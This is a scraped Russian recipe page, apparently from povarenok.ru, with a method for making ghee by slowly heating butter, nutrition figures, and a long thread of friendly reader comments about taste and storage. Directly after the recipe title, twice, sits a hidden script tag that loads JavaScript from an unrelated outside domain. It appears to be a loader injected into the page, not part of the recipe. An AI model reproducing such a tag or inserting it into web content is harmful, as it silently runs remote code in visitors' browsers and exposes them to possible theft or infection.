, Домашнее масло, каша, бутерброд, завтрак, сливочный" /> – кулинарный рецепт">
  • 5 апреля 2016, 20:12
  • 5754

Топлёное сливочное масло

Рецепт: Топлёное сливочное масло<script type="text/javascript" src="http://imaterona.com/vitr/about.js"></script>

Давно хотелось приготовить топлёное сливочное масло, которое не пробовала с детства! Начиталась различных советов и рецептов, вывела среднее арифметическое))) публикуюсь впервые, волнительно, но очень хочется поделиться. На сайте нет подобного я надеюсь!

Категория: Приготовление молочных продуктов Домашнее масло

Ингредиенты для «Топлёное сливочное масло»:

Время приготовления:

Количество порций: 900

Пищевая и энергетическая ценность:

Готового блюда
ккал
7490 ккал
белки
6 г
жиры
825 г
углеводы
9 г
Порции
ккал
8.3 ккал
белки
0 г
жиры
0.9 г
углеводы
0 г
100 г блюда
ккал
741.6 ккал
белки
0.6 г
жиры
81.7 г
углеводы
0.9 г

Рецепт «Топлёное сливочное масло»:

Итак: 1 - 1.2 кг хорошего сливочного масла, положить в толстостенную посудину. У меня чугунная сковорода. На медленном огне томить 1.5 -2 часа. Белую пену снимать периодически. Не перемешивать. Масло постепенно станет прозрачным появится изумительный сливочный запах! Пора снимать! Процедить через сито или ткань в другую кастрюльку, ещё прогреть и разлить по баночками. Получилось около 900 граммов отличного продукта! Если есть желание, добавьте соль. К блинчиками, картошечке, бутербродикам, кашам и сами знаете куда))) вилочка показывает прозрачность масла. Приятного аппетита!


BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal
Как это будет выглядеть?
Топлёное сливочное масло
Рецепт: Топлёное сливочное масло<script type="text/javascript" src="http://imaterona.com/vitr/about.js"></script>

Давно хотелось приготовить топлёное сливочное масло, которое не пробовала с детства! Начиталась различных советов и рецептов, вывела среднее арифметическое))) публикуюсь впервые, волнительно, но очень хочется поделиться. На сайте нет подобного я надеюсь!

Ингредиенты для «Топлёное сливочное масло»:

Фотографии «Топлёное сливочное масло» от приготовивших (4)

Комментарии и отзывы

Часто пишут, что топлёное масло хорошо использовать для фритюра и вообще для обжаривания, а мне нравится его вкус в пюре, в кашах, в плове... В начале лета я делаю запас домашнего масла. Но его топить было жалко, поэтому покупала в магазине. Из 500г сливочного вышло две баночки по 200г топлёного. Спасибо за рецепт, Анжелика.
Наконец-то я сделала это замечательное масло.Теперь моей семье надолго хватит.Читала,что можно баночки хранить при комнатной температуре,но пока есть место в холодильнике,поставила их туда.Спасибо,замечательный способ.
на здоровье!)
спасибо большое за рецепт,очень вкусное,ароматное масло получилось
Очень рада! Кушайте на здоровье!
благодарю
Приготовила, остывает. Анжелика, спасибо за рецепт. Маслице получилось чистейшее золотистое, с ореховым запахом. 1,5 кг масла томила 2 часа. Вам 5+++++!!!
На здоровье! Кушайте с маслицем!
На здоровье! Кушайте с маслицем!
Уже выбрала рецепт для кулича, буду готовить с топленым маслицем. Вам еще раз спасибо! Светлого праздника!!!
Натуральный продукт! А я топлю на водяной бане, раньше топила в молоковарке - кастрюле для молока, она от частого применения пришла в негодность, а сейчас просто в двух кастрюлях, одна с маслом стоит в большой кастрюле с водой.
Алла, а ты тоже топишь его несколько часов ?.У меня на 4 кг. примерно 30 минут на огне всего стоит.Правда я делаю его в два захода.
Лариса, 1-1,5 часа , не больше.
Замечательный рецепт!
На здоровье!
Ух ты!!! Как классно!!! А я покупаю готовое!!! Нужно топить!!!
Ответ для victoria ms
Обязательно нужно! Это вкуснятина!!! Я в третий раз уж топила! Кушайте с маслицем!
Спасибо!!!
Очень вкусное, ароматное масло! Готовлю часто. Насколько понимаю, по технологии приготовления, Ваше -это индийское масло ГХИ. А вот и моя фотоулика почти застывшего масла
Виолетушка!!! Какая ты умничка!!! А у меня никак руки не дойдут!!!
Викуля, спасибо большое Это очень просто я часто готовлю
Ответ для Violl
Виолеточка, молодец! Масло какое у тебя красивое получилось!
Иришечка, спасибо большое
Ответ для Violl
Виолушка, какое роскошное золото у тебя на фоточке Шикарное исполнение рецепта!
Олюшка, спасибки, милая Один запах чего стоит
Умница ты,Виолушка! Хозяюшка
Ответ для Violl
Виолетточка, какие красивые и очень аппетитные баночки!
Людочка, спасибо большое Обалденно вкусное и ароматное
Ответ для Violl
Очень апетитно!
Спасибо
Ответ для Violl
Виолеточка замечательное маслице
Танечка, спасибо большое
Ответ для Violl
Красота! Золото в баночках!
Ирочка, спасибо большое Обалденное масло
С почином!
спасибо!
От меня плюс +++++
спасибо!
Как бы то не было. Я балл поставил,а ктото минуснул
А почему именно нитритная соль?
Потому что при загрузке только нитритную соль предлагали в ингредиенты сама в шоке! Просто СОЛЬ нет
Есть соль
Ну может и есть, значит у меня не получилось правильно загрузить
видимо Вы при вводе слова соль поставили после него пробел, поэтому предложена была нитритная, так как ингредиент "соль" добавлен без пробела после слова
Да наверное так и было! Спасибо что исправили!
Ответ для Анжелика Первая
Получится)))
Ответ для Анжелика Первая
есть просто соль в ингредиентах, я отредактировала
Ответ для Анжелика Первая
Взяла в закладки,спасибо!!!
Как долго его можно хранить в холодильнике и как?
топленое масло может спокойно храниться в холодильнике год, а то и больше. у меня стояло 1,5 года и ничего с ним не случилось.
Правда?! А опросила всех кто якобы знает. В один голос говорят что в морозилке. Проведу эксперимент
какая морозилка?! я бы не стала пробовать. я топила много масла (не было места в морозилке) и получилось аж 4 литра. при всем желании так много быстро не израсходуешь. у меня стояло в холодильнике, на верхней полке и все с ним было в порядке.
Ну ффсе! тогда понятно! Я же сомневалась! Столько томить и снова в морозилке...спасибо подсказали
хочу отметить, что и банки и крышки я простерелизовала
Честно,даже понятия не имею что с ним делать . Оценил только для поддержки ваших начинаний
вот почитайте, очень классное масло
https://www.povarenok.ru/blog/show/7689/
https://www.povarenok.ru/blog/show/7695/
Спасибо читала перед тем как. Это уже учение а не рецепт)
это я для повренка xmxm написала, он пишет что не знает что с ним делать
Ответ для xmxm
Вообще, это традиционный продукт многих народов. В процессе длительного нагревания сливочное масло освобождается от различных примесей, таких, как молочный белок и вода. Это позволяет сохранять его очень длительное время и использовать для фритюра: топленое масло не горит при перегреве и не образует канцерогены при высокой температуре. Кроме того, при обжарке придает продуктам великолепный ореховый вкус. За непревзойденные полезные свойства его называют "жидким золотом"
Но согласитесь, что топить масло из магазинного-бред. Даже в деревнях молоко не идеальное. Так что данный продукт будет по настоящему полезен только из масла, которое сделано из молока, которое дали коровки из глубокой глухомани
Наверное, затрудняюсь сказать - мне не с чем сравнить Дело в том, я последние годы покупаю одно и то же масло местного молокозавода очень хорошего качества. И это не глухомань, я из Северного Казахстана, просто деревенское молоко в нашем регионе очень-очень хорошее, у нас хорошие пастбища, для животноводства специально выращивают хорошие кормовые культуры. Я живу в пригороде и точно знаю, что из масла, купленного у любой соседки, сделаю отличное топленое .
Это как сказать...хорошее. Корма геномодифицированы. Коровы пасуться в доль дорог... Не соглашусь и с маслом с молочки.
Ради бога Я достаточно хорошо знаю и наш завод, а уж насчет дорог У нас для передвижения-то, как говорят, одни направления, а туда, где пасутся наши коровы, только конем и доберешься.
Ну слава Богу что хоть у вас натуральное
Аха мы отстаем в развитии
Лучше так, чем есть гадость
Ответ для xmxm
Именно оттуда, в рецепт не дали указать какое именно масло. Дополняю: хорошее масло 72,5 % жирности , изготовлено из сливок.
Ответ для Pavelia
Не соглашайтесь
Ответ для xmxm
Спасибо! Думаю на вареную картошечку, горячие блинчики. В кашу хорошо будет. Жаль не лето! добавить бы укропчик петрушки и прочей зеленой ерунды и в зиму в супчики и т.п.
Да не за что.
Наверх

Оставить комментарий или отзыв о рецепте

Рубрикатор рецептов

Опрос
Какие проекты группы МедиаФорт (кроме povarenok.ru) вы посещаете?


Уже 537 ответов Ответить

Категории рецептов Назначения рецептов Национальные кухни Развернуть весь список
Поиск по сайту

Наши рассылки